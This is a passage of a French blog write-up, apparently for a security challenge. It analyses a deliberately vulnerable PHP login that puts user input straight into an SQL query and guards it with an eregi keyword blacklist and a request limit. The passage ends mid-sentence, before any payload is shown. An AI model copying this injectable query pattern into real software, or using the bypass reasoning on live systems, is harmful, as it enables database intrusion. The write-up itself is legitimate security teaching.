<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$query</span> <span class="sy0" style="color: #339933;">=</span> <span class="st0" style="color: blue;">"insert into rms_120_pw values('<span class="es4" style="color: #006699; font-weight: bold;">$_SERVER[REMOTE_ADDR]</span>', '<span class="es4" style="color: #006699; font-weight: bold;">$_SESSION[password]</span>')"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_query</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$query</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$left_count</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: #000088;">$max_times</span><span class="sy0" style="color: #339933;">-</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">++;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: #000088;">$_POST</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'password'</span><span class="br0" style="color: #009900;">]</span> <span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span><span class="kw3" style="color: #990000;">eregi</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"replace|load|information|union|select|from|where|limit|offset|order|by|ip|\.|#|-|/|\*"</span><span class="sy0" style="color: #339933;">,</span><span class="re0" style="color: #000088;">$_POST</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'password'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">exit</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"Wrong access"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$query</span> <span class="sy0" style="color: #339933;">=</span> <span class="st0" style="color: blue;">"select * from rms_120_pw where (ip='<span class="es4" style="color: #006699; font-weight: bold;">$_SERVER[REMOTE_ADDR]</span>') and (password='<span class="es4" style="color: #006699; font-weight: bold;">$_POST[password]</span>')"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$q</span> <span class="sy0" style="color: #339933;">=</span> <span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_query</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$query</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$res</span> <span class="sy0" style="color: #339933;">=</span> <span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_fetch_array</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$q</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$res</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'ip'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">==</span><span class="re0" style="color: #000088;">$_SERVER</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'REMOTE_ADDR'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">exit</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"True"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">else</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">exit</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"False"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy1" style="font-weight: bold;">?></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy1" style="font-weight: bold;">.... code html du formulaire ...</span></div>
</li>
</ol>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Pour la suite je reprendrait ce qui nous intéresse mais je vous recommande la lecture de ce code pour une meilleure compréhension.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On peux d'hors et déja se douter qu'on ne sait pas encore comment mais ce password "magique" il nous le faut !</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
2-<u>Analyse de code</u>:</div>
<div style="text-align: left;">
Afin de gagner du temps (oui j'ai la flemme d'écrire aussi...) nous allons ici lister la vulnérabilité mais aussi et surtout les moyens mis en oeuvre pour tenter de sécuriser ce code.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
a) Les sécurités mise en oeuvre:</div>
<div style="text-align: left;">
la première qui saute aux yeux se trouve en ligne 44:</div>
<div style="text-align: left;">
<br /></div>
<ol style="background-color: #f8f8f8; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="kw1"> </span><span class="br0" style="color: #009900;">(</span><span class="kw3" style="color: #990000;">eregi</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"replace|load|information|union|select|from|where|limit|offset|order|by|ip|\.|#|-|/|\*"</span><span class="sy0" style="color: #339933;">,</span><span class="re0" style="color: #000088;">$_POST</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'password'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">exit</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"Wrong access"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span style="color: #009900;">}</span></div>
</li>
</ol>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
La à première vue à voir les mots matched ET les / * on se dit que le bypass est pas forcément gagné ... on reviendra dessus par la suite ;-).</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Viens ensuite une autre problématique qui est les 120 requêtes autorisées!</div>
<div style="text-align: left;">
Oui, si on regarde attentivement la ligne 25 on vois que si on dépasse la limite des 120 alors notre SESSIONID sera réinitialisé et donc le password sera changé par appel à la fonction <span style="background-color: white; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">RandomString</span><span class="br0" style="color: #009900; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">(</span><span class="br0" style="color: #009900; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">)</span>.</div>
<div style="text-align: left;">
<br /></div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$max_times</span> <span class="sy0" style="color: #339933;">=</span> <span class="nu0" style="color: #cc66cc;">120</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span> <span class="sy0" style="color: #339933;">></span> <span class="re0" style="color: #000088;">$max_times</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">unset</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span> <span class="sy0" style="color: #339933;">!</span><span class="kw3" style="color: #990000;">isset</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'cnt'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">0</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$_SESSION</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'password'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">=</span>RandomString<span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
</ol>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
A cela viendra s'ajouter la vérification d'ip qui dans le cas d'une exploitation en bind aura un rôle primordial car seul une fois cette condition supplémentaire remplis la fonction renverra True, tout les reste passera systématiquement en False ce qui, j'ai pu le constater est pas forcément si évident notamment a cause des url_encode:</div>
<div style="text-align: left;">
<br /></div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$res</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'ip'</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">==</span><span class="re0" style="color: #000088;">$_SERVER</span><span class="br0" style="color: #009900;">[</span><span class="st_h" style="color: blue;">'REMOTE_ADDR'</span><span class="br0" style="color: #009900;">]</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">exit</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"True"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">else</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="sy0" style="color: #339933;">@</span><span class="kw3" style="color: #990000;">mysql_close</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$link</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #990000;">exit</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: blue;">"False"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
</ol>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
b) Vulnérabilité: </div>
<div style="text-align: left;">
elle se trouve ligne 49:</div>
<div style="text-align: left;">
<br /></div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$query</span> <span class="sy0" style="color: #339933;">=</span> <span class="st0" style="color: blue;">"select * from rms_120_pw where (ip='<span class="es4" style="color: #006699; font-weight: bold;">$_SERVER[REMOTE_ADDR]</span>') and (password='<span class="es4" style="color: #006699; font-weight: bold;">$_POST[password]</span>')"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
</ol>
<br />
mais pas que!<br />
En effet, l'entrée utilisateur n'est pas du tout bien gérée, elle n'est pas "sanitized".<br />
Bon c'est bien beau tout ça mais alors ou est l'autre vulnérabilité me direz vous ?<br />
<br />
Tout simplement dans la fonction eregi utilisé pour matcher les patterns, souvenez vous :<br />
<span class="kw3" style="color: #990000; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">eregi</span><span class="br0" style="color: #009900; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">(</span><span class="st0" style="color: blue; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">"replace|load|information|union|select|from|where|limit|offset|order|by|ip|\.|#|-|/|\*"</span><span class="sy0" style="color: #339933; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">,</span><span class="re0" style="color: #000088; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera 